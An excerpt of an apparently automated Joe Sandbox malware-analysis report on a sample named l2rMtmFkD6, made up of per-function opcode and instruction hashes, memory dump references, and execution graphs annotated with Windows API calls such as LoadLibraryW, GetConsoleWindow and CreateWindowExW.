                        • Instruction ID: 17d0841c6b8e31569a3c0c6ff3ba01bd966aa9f26fa1b12218c44f0b7bff825c
                        • Opcode Fuzzy Hash: 07b0a8f749a7e80d41153d2b8fe3bd8c3d8fff277c04d5358ce4cd1226b8192b
                        • Instruction Fuzzy Hash: DDB1AD70B082049FDB65DFB5C4507AEBBFAAF89300F1488AAE186D7691DF74D901CB51
                        Function 00CBDF4C Relevance: .3, Instructions: 264COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2098253452.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_cb0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ca24ec2c7a8ac235b242987a648c9b7771feacd6221dfafd3192215c4f6229ae
                        • Instruction ID: 206043df9d108e700b963296b33e56927e65a87c6c6f77b1ada389d451d66a28
                        • Opcode Fuzzy Hash: ca24ec2c7a8ac235b242987a648c9b7771feacd6221dfafd3192215c4f6229ae
                        • Instruction Fuzzy Hash: EFA15E32E002198FCF19DFB5C8445EEB7B2FF84300B15457AE816AB265EB71E956DB80
                        Function 05C47E17 Relevance: .1, Instructions: 125COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b5a4d21ebb5d604a6cbd5d7a8bd48c05f42d98f06c7eeda34db62a1177b486f9
                        • Instruction ID: afdcab17b15c6b8c8356f1a2da4c6a3e9d07d4ac37bbcab754aefa9687ed0405
                        • Opcode Fuzzy Hash: b5a4d21ebb5d604a6cbd5d7a8bd48c05f42d98f06c7eeda34db62a1177b486f9
                        • Instruction Fuzzy Hash: F7512BB4E142198BDB14DFA9C5849AEFBF2FF88304F24C56AD418AB315D7309942CFA1

                        Execution Graph

                        Execution Coverage:13.1%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:30
                        Total number of Limit Nodes:1
                        execution_graph 28508 6966361 28509 69662fc 28508->28509 28510 696636a 28508->28510 28514 6967400 28509->28514 28518 69673f1 28509->28518 28511 696631d 28516 6967448 28514->28516 28515 6967451 28515->28511 28516->28515 28522 6966f98 28516->28522 28519 696738d 28518->28519 28519->28518 28520 6967451 28519->28520 28521 6966f98 LoadLibraryW 28519->28521 28520->28511 28521->28520 28523 69675f0 LoadLibraryW 28522->28523 28525 6967665 28523->28525 28525->28515 28526 14d0871 28530 14d08c8 28526->28530 28535 14d08d8 28526->28535 28527 14d0889 28531 14d08fa 28530->28531 28540 14d0ce8 28531->28540 28544 14d0ce0 28531->28544 28532 14d093e 28532->28527 28536 14d08fa 28535->28536 28538 14d0ce8 GetConsoleWindow 28536->28538 28539 14d0ce0 GetConsoleWindow 28536->28539 28537 14d093e 28537->28527 28538->28537 28539->28537 28541 14d0d26 GetConsoleWindow 28540->28541 28543 14d0d56 28541->28543 28543->28532 28545 14d0d26 GetConsoleWindow 28544->28545 28547 14d0d56 28545->28547 28547->28532

                        Executed Functions

                        Function 069675E8 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,069674A6), ref: 06967656
                        Memory Dump Source
                        • Source File: 00000008.00000002.2221227138.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6960000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: e7e7de002a6ccde9f92ad7aef111b9efe0a21d3473183700b6d1643e40561723
                        • Instruction ID: 9cf991521740358f3f823f40f9c48673ce4d656448c920ffa8bfe4ef379a7d31
                        • Opcode Fuzzy Hash: e7e7de002a6ccde9f92ad7aef111b9efe0a21d3473183700b6d1643e40561723
                        • Instruction Fuzzy Hash: A51112B5C003498FDB10DF9AD544ACEFBF8AB88324F20842AD429A7710D374A546CFA5
                        Function 06966F98 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,069674A6), ref: 06967656
                        Memory Dump Source
                        • Source File: 00000008.00000002.2221227138.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6960000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 95aa0abeb00138bc03c45542f14a65ed48bb22ba46154722c8b12c52050b7a61
                        • Instruction ID: 9b5481390f37bc6dff4ffa13c004c6b1b1c48c1e8ddb5482e1458a605485eb31
                        • Opcode Fuzzy Hash: 95aa0abeb00138bc03c45542f14a65ed48bb22ba46154722c8b12c52050b7a61
                        • Instruction Fuzzy Hash: 211123B1D003498FDB10DF9AC448A9EFBF8EF88214F14846AE41AB7610D375A545CFA5
                        Function 014D0CE0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                        Download Yara Rule
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 014D0D47
                        Memory Dump Source
                        • Source File: 00000008.00000002.2206142293.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_14d0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID:
                        • API String ID: 2863861424-0
                        • Opcode ID: c5a46733b663e1b37d821de50fbbc8cfe4353ebb8d48def18fcdbb055011ceed
                        • Instruction ID: 6e1dc50682d983c8844feb88df41484e1a2adc8909115e310e67542a0afd1d79
                        • Opcode Fuzzy Hash: c5a46733b663e1b37d821de50fbbc8cfe4353ebb8d48def18fcdbb055011ceed
                        • Instruction Fuzzy Hash: 551134B1D003498FCB24DFAAC4497EEBFF4EB89324F20842AC019A7250C7386945CBA1
                        Function 014D0CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 014D0D47
                        Memory Dump Source
                        • Source File: 00000008.00000002.2206142293.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_14d0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID:
                        • API String ID: 2863861424-0
                        • Opcode ID: da0437e1398f1ee9a2e4c89e28831a0984aea33d87e2bb32c799e05be21a29d1
                        • Instruction ID: 063ee6ac067cbf5a64a08fc0b2697a170d76c680046c3a27a6f704e1cc366a7c
                        • Opcode Fuzzy Hash: da0437e1398f1ee9a2e4c89e28831a0984aea33d87e2bb32c799e05be21a29d1
                        • Instruction Fuzzy Hash: F91136B1D003498FCB20DFAAC4497DFFFF4AB88324F20841AD419A7240C775A545CBA1
                        Function 069B1550 Relevance: 1.4, Instructions: 1419COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2221338950.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_69b0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4e553ecb591074f1606d5ad0800fc97203d68691c9c1e2e9c4105e0160847663
                        • Instruction ID: a49ed3427924965990301f313d1b0cb2f182679e49d5db44e7f2c3d3ee7153d0
                        • Opcode Fuzzy Hash: 4e553ecb591074f1606d5ad0800fc97203d68691c9c1e2e9c4105e0160847663
                        • Instruction Fuzzy Hash: A0C24F74B002189FCB14DB64C991EEDBBB6FF88700F508099E609AB3A5DB71AD81CF55
                        Function 069B33E7 Relevance: 1.4, Instructions: 1374COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2221338950.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_69b0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3e733e6f085ab00fe01eea9cd557287a7cd215b0449207543cb0452a348bb7b7
                        • Instruction ID: b98f4230efc32e53801cf2d1a500d0ffe3ce81380bd667745b86b1b29c3774fc
                        • Opcode Fuzzy Hash: 3e733e6f085ab00fe01eea9cd557287a7cd215b0449207543cb0452a348bb7b7
                        • Instruction Fuzzy Hash: 5BD1B274B002059FCB44CF68C994AAEBBF6FF89310B1584AAE905DB7A1CB75DC05CB51
                        Function 069B0048 Relevance: .7, Instructions: 665COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2221338950.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_69b0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 21f3431f869b451ba5fb1d626c1314aff6ba3d318daa99c601e7b57913c12b95
                        • Instruction ID: 30964077bfef77bee91f00957e42c32b83072f4f3d56ddc742f12bda97b1082c
                        • Opcode Fuzzy Hash: 21f3431f869b451ba5fb1d626c1314aff6ba3d318daa99c601e7b57913c12b95
                        • Instruction Fuzzy Hash: F1426B7070061A8FCB25EF68D460A6FBBB6FFC1710B204D5DD9029B794CBB5AD058B86
                        Function 069B04F4 Relevance: .5, Instructions: 501COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2221338950.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_69b0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b61ebf86367766424f52b81faaf55edbd28f0d2113b8e543bd6394699fea8a25
                        • Instruction ID: 0260b5913235fc286c41a347b1d48c991d28e93a02224cfc1f74ef4acca49301
                        • Opcode Fuzzy Hash: b61ebf86367766424f52b81faaf55edbd28f0d2113b8e543bd6394699fea8a25
                        • Instruction Fuzzy Hash: 2712CE7070061A8FCB11DF68C450AAFBBB6FF85710F20494DE9029B7A5CBB5ED458B82
                        Function 069B056A Relevance: .5, Instructions: 466COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2221338950.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_69b0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7091204dcedd9978f90e891cef01631ad96624a40aacb2d7a2579f1bedac36c7
                        • Instruction ID: f7292b3643b353827d82651186fd0cab40e790089c79a684056dcfb5cb64e37b
                        • Opcode Fuzzy Hash: 7091204dcedd9978f90e891cef01631ad96624a40aacb2d7a2579f1bedac36c7
                        • Instruction Fuzzy Hash: B212BD707002198FCB10DF68C550AAFBBB6FF85710F20894DE9029B7A5CBB5ED458B82
                        Function 069B05E0 Relevance: .4, Instructions: 428COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2221338950.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_69b0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ae34c6f356f3a9d0b0a8a102b6089728101e5480b5e678be7baced8aa86099ec
                        • Instruction ID: e6ea2cdbec682f07b52c683acb4191fc0979fb214f65d0c584a174213ae9389f
                        • Opcode Fuzzy Hash: ae34c6f356f3a9d0b0a8a102b6089728101e5480b5e678be7baced8aa86099ec
                        • Instruction Fuzzy Hash: 6E02B2707002158FCB10DF68C550AAFBBB6FF85710F208849E9029B7A5CBB5ED45CB92
                        Function 069B0656 Relevance: .4, Instructions: 390COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2221338950.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_69b0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d873dc570c388bd0c16266275ddcdea8b2cd3b5caeac3f13e840d1cc91365af3
                        • Instruction ID: deaccd49ca7cdc76ea2153c3c9ece0befc6d263aba719596eca9e0c8ac03b7a7
                        • Opcode Fuzzy Hash: d873dc570c388bd0c16266275ddcdea8b2cd3b5caeac3f13e840d1cc91365af3
                        • Instruction Fuzzy Hash: 05F19070B002159FDB00DF68C951AAF7BB6FF85700F208849E9029B7A5CBB5ED45CB92
                        Function 069B06CC Relevance: .4, Instructions: 356COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2221338950.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_69b0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7cf17b1aba24195ead25d77d0bb9b22df5cf47d2485fbe5f00e68190d3a4342b
                        • Instruction ID: b348ce49c82596ed47fcdda035474c1315dd97cdf498e3205e8c5feaed8657f3
                        • Opcode Fuzzy Hash: 7cf17b1aba24195ead25d77d0bb9b22df5cf47d2485fbe5f00e68190d3a4342b
                        • Instruction Fuzzy Hash: 5AE18D70B002199FDB00DF68C955AAF7BBAFF85700F20845AE9019B7A5CBB1DD45CB92
                        Function 069B0001 Relevance: .4, Instructions: 350COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2221338950.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_69b0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 56ea2e7cb2175d3c9bab54d36bc4e83bd28045736e6d30d860b4ffb254b30744
                        • Instruction ID: 51b932de70749b58655abddfdc0a23e768285cb53e97ba348ab7dd64f9687187
                        • Opcode Fuzzy Hash: 56ea2e7cb2175d3c9bab54d36bc4e83bd28045736e6d30d860b4ffb254b30744
                        • Instruction Fuzzy Hash: 8ED19130B002049FDB41DF64C955AAF7BBAFF85700F21849AE9019B7A5CBB1DD45CB92
                        Function 069B3138 Relevance: .2, Instructions: 241COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2221338950.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_69b0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7a7384ae4535cc39093ebefbe30ee6b22b4fccbfb5e1baa66ce82efbd290990e
                        • Instruction ID: 4464def49ba9f7f772cd5dd785931fc659e2623e643f807a0129518a8a9cb60b
                        • Opcode Fuzzy Hash: 7a7384ae4535cc39093ebefbe30ee6b22b4fccbfb5e1baa66ce82efbd290990e
                        • Instruction Fuzzy Hash: 30917D39B101059FCB44CF68C994E9EBBF6FF89710B6580A9E909AB361DB31EC05CB51
                        Function 069B11A8 Relevance: .2, Instructions: 203COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2221338950.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_69b0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 600b56604701f8919c352b477fa6b3796ab6c822279f58fa9dc3817b8f4e8066
                        • Instruction ID: ef37807b908bc047203bb18000748bea3270f57212d72f66db7692f4524a55cc
                        • Opcode Fuzzy Hash: 600b56604701f8919c352b477fa6b3796ab6c822279f58fa9dc3817b8f4e8066
                        • Instruction Fuzzy Hash: 0E514C32B042058FCB549F6DDA605BEB7E9EFC6211B28857BD845CBA10EF31C842C7A1
                        Function 0141D054 Relevance: .1, Instructions: 77COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2205408812.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_141d000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 753ae442b05668d3eb399ea9a6881cc76b8894dab05a393927b898bd4080d847
                        • Instruction ID: 7149683ae212e36b422e5caba0e3d9ccbe5c6663003bc86bcea12dad3d11bc55
                        • Opcode Fuzzy Hash: 753ae442b05668d3eb399ea9a6881cc76b8894dab05a393927b898bd4080d847
                        • Instruction Fuzzy Hash: 8821C7F1904240EFDB15DF54D9C4B17BFA5FB88314F24C56AE9490A26AC336D416CB61
                        Function 0142D2C4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2205553618.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_142d000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 644756a1c65ffde8304c5d62a7280bb0941ca4180411cf51ed43d174f59f1aae
                        • Instruction ID: ae89ca8797bd46f44de5069fcbfaa15aa774c1de213b7d5d32929709f45ba049
                        • Opcode Fuzzy Hash: 644756a1c65ffde8304c5d62a7280bb0941ca4180411cf51ed43d174f59f1aae
                        • Instruction Fuzzy Hash: 302108B1904244DFDB05DF98D9C0B2ABB65FB84324F64C56ED8494B356C33AD486CAB1
                        Function 0142D474 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2205553618.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_142d000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cf9861ee08c6c76a286cd3ab42d333d9875c8807f9e7affbf4cd164e18ca7ff5
                        • Instruction ID: 66e047359a75e2130577b5f793d9cddc3ea4242e5bfbebe6d5286a7aeb21ddb0
                        • Opcode Fuzzy Hash: cf9861ee08c6c76a286cd3ab42d333d9875c8807f9e7affbf4cd164e18ca7ff5
                        • Instruction Fuzzy Hash: 15214971904200EFDB05DF98D5C4B26BB65FB88318F64C96ED8094B362C776E486CA62
                        Function 0141D04F Relevance: .1, Instructions: 58COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2205408812.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_141d000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 235392520c3f1e7e09b6d89c66da8016760e9a9590b2b0d78f6be887e7f5212d
                        • Instruction ID: ad960c6367cadfb8d6e52e9688b4f1aece59047ae65aedca4d349bff04760ae4
                        • Opcode Fuzzy Hash: 235392520c3f1e7e09b6d89c66da8016760e9a9590b2b0d78f6be887e7f5212d
                        • Instruction Fuzzy Hash: 492193B6904240DFDB16CF54D9C4B16BF72FB88314F24869AD9490A66BC33AD416CB91
                        Function 0142D46F Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2205553618.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_142d000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                        • Instruction ID: b0aab87e14910d41f3d5ae6d524dfe561842b6b7b75cb8a1a96fcfaab143caba
                        • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                        • Instruction Fuzzy Hash: F811DD75904280CFDB02CF54D5C4B16BFB1FB88318F24C6AAD8494B766C37AD48ACB62
                        Function 0142D2BF Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2205553618.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_142d000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1d83059ff187c22e3bca89aa6d0a7c180522d0170c37a0a04a994941a968178a
                        • Instruction ID: 56b37a22ead810f9e3808e2fac15cd590ea283206810101cb8eccc92c791969e
                        • Opcode Fuzzy Hash: 1d83059ff187c22e3bca89aa6d0a7c180522d0170c37a0a04a994941a968178a
                        • Instruction Fuzzy Hash: 3E11BF76904280CFDB12CF14D5C4B1AFF61FB84324F28C6AAD8494B756C33AD44ACBA2
                        Function 069B12E0 Relevance: .0, Instructions: 50COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2221338950.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_69b0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 45501f8f402405ebb63692b0af285e7f3c7ff34ed06b058586d5d860e27f8003
                        • Instruction ID: d898ca8fa889a9a2cbd9aa0e03571aedda8a9b705e41e418b359d2d0e5793756
                        • Opcode Fuzzy Hash: 45501f8f402405ebb63692b0af285e7f3c7ff34ed06b058586d5d860e27f8003
                        • Instruction Fuzzy Hash: 4401F732A1470A8FCB50BE69DA504EEBBBCEE81251B58523ADC0557A10FF30D984C6B2
                        Function 0141DA81 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2205408812.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_141d000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d14931f603f638dff833a3c5266190e5b6b4faacaf8ab1a891d393037b34a753
                        • Instruction ID: 1351df1694affadae613a2f72ae5739b0b54352a41581ebcbe5b9281e294c6ca
                        • Opcode Fuzzy Hash: d14931f603f638dff833a3c5266190e5b6b4faacaf8ab1a891d393037b34a753
                        • Instruction Fuzzy Hash: C6012BB290C3409AF710CA99CDC8767BF98DF413A0F18C55BED090A29AC3749841C671
                        Function 0141DA80 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2205408812.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_141d000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 09ed2db3b6b7a97a200bef8e62088ff1644b651e98abebf11756118d386e3c4b
                        • Instruction ID: 3f5edaacd5a202eaccf2cd073394695d4d04462af1fc6c6444aebbf457d1a803
                        • Opcode Fuzzy Hash: 09ed2db3b6b7a97a200bef8e62088ff1644b651e98abebf11756118d386e3c4b
                        • Instruction Fuzzy Hash: BCF0C2B25083849EE7118A09CDC8B63FF98EF41774F18C45AED080A296C3789844CA70

                        Execution Graph

                        Execution Coverage:11.7%
                        Dynamic/Decrypted Code Coverage:97.1%
                        Signature Coverage:0%
                        Total number of Nodes:278
                        Total number of Limit Nodes:14
                        execution_graph 34220 5d1e200 34221 5d1e38b 34220->34221 34223 5d1e226 34220->34223 34223->34221 34224 5d1b958 34223->34224 34225 5d1e480 PostMessageW 34224->34225 34226 5d1e4ec 34225->34226 34226->34223 34241 259b038 34245 259b11f 34241->34245 34253 259b130 34241->34253 34242 259b047 34246 259b141 34245->34246 34247 259b164 34245->34247 34246->34247 34261 259b3c8 34246->34261 34265 259b3c7 34246->34265 34247->34242 34248 259b15c 34248->34247 34249 259b368 GetModuleHandleW 34248->34249 34250 259b395 34249->34250 34250->34242 34254 259b141 34253->34254 34255 259b164 34253->34255 34254->34255 34259 259b3c8 LoadLibraryExW 34254->34259 34260 259b3c7 LoadLibraryExW 34254->34260 34255->34242 34256 259b15c 34256->34255 34257 259b368 GetModuleHandleW 34256->34257 34258 259b395 34257->34258 34258->34242 34259->34256 34260->34256 34262 259b3dc 34261->34262 34264 259b401 34262->34264 34269 259ab30 34262->34269 34264->34248 34266 259b3dc 34265->34266 34267 259b401 34266->34267 34268 259ab30 LoadLibraryExW 34266->34268 34267->34248 34268->34267 34270 259b5a8 LoadLibraryExW 34269->34270 34272 259b621 34270->34272 34272->34264 34305 2594668 34306 259467a 34305->34306 34307 2594686 34306->34307 34311 2594778 34306->34311 34316 2594218 34307->34316 34309 25946a5 34312 259479d 34311->34312 34320 2594888 34312->34320 34324 2594887 34312->34324 34317 2594223 34316->34317 34332 2595dec 34317->34332 34319 259700c 34319->34309 34322 25948af 34320->34322 34321 259498c 34321->34321 34322->34321 34328 25944e0 34322->34328 34326 25948af 34324->34326 34325 259498c 34325->34325 34326->34325 34327 25944e0 CreateActCtxA 34326->34327 34327->34325 34329 2595918 CreateActCtxA 34328->34329 34331 25959db 34329->34331 34331->34331 34333 2595df7 34332->34333 34336 2595e0c 34333->34336 34335 2597115 34335->34319 34337 2595e17 34336->34337 34340 2595e3c 34337->34340 34339 25971fa 34339->34335 34341 2595e47 34340->34341 34344 2595e6c 34341->34344 34343 25972ed 34343->34339 34346 2595e77 34344->34346 34345 2598991 34345->34343 34346->34345 34348 259d0f8 34346->34348 34349 259d119 34348->34349 34350 259d13d 34349->34350 34352 259d2a8 34349->34352 34350->34345 34353 259d2b5 34352->34353 34355 259d2ef 34353->34355 34356 259ce88 34353->34356 34355->34350 34357 259ce93 34356->34357 34358 259dc00 34357->34358 34360 259cfb4 34357->34360 34361 259cfbf 34360->34361 34362 2595e6c CreateWindowExW 34361->34362 34363 259dc6f 34362->34363 34366 259fa00 34363->34366 34364 259dca9 34364->34358 34368 259fb31 34366->34368 34369 259fa31 34366->34369 34367 259fa3d 34367->34364 34368->34364 34369->34367 34370 4cc09bf CreateWindowExW 34369->34370 34371 4cc09c0 CreateWindowExW 34369->34371 34370->34368 34371->34368 34372 5d1af60 34373 5d1af66 34372->34373 34374 5d1ae74 34372->34374 34373->34374 34378 5d1cfc8 34373->34378 34392 5d1d02e 34373->34392 34407 5d1cfb8 34373->34407 34379 5d1cfe2 34378->34379 34385 5d1cfea 34379->34385 34422 5d1d934 34379->34422 34430 5d1dcf5 34379->34430 34434 5d1d972 34379->34434 34438 5d1d812 34379->34438 34443 5d1da11 34379->34443 34448 5d1d2eb 34379->34448 34454 5d1d888 34379->34454 34460 5d1d7c2 34379->34460 34464 5d1d8c3 34379->34464 34468 5d1d3ff 34379->34468 34474 5d1dd9c 34379->34474 34385->34374 34393 5d1cfbc 34392->34393 34395 5d1d031 34392->34395 34394 5d1cf9b 34393->34394 34396 5d1da11 2 API calls 34393->34396 34397 5d1d812 2 API calls 34393->34397 34398 5d1d972 2 API calls 34393->34398 34399 5d1dcf5 2 API calls 34393->34399 34400 5d1d934 4 API calls 34393->34400 34401 5d1dd9c 2 API calls 34393->34401 34402 5d1d3ff 2 API calls 34393->34402 34403 5d1d8c3 2 API calls 34393->34403 34404 5d1d7c2 2 API calls 34393->34404 34405 5d1d888 4 API calls 34393->34405 34406 5d1d2eb 2 API calls 34393->34406 34394->34374 34395->34374 34396->34394 34397->34394 34398->34394 34399->34394 34400->34394 34401->34394 34402->34394 34403->34394 34404->34394 34405->34394 34406->34394 34408 5d1cf9b 34407->34408 34409 5d1cfc3 34407->34409 34408->34374 34410 5d1da11 2 API calls 34409->34410 34411 5d1d812 2 API calls 34409->34411 34412 5d1d972 2 API calls 34409->34412 34413 5d1dcf5 2 API calls 34409->34413 34414 5d1d934 4 API calls 34409->34414 34415 5d1dd9c 2 API calls 34409->34415 34416 5d1d3ff 2 API calls 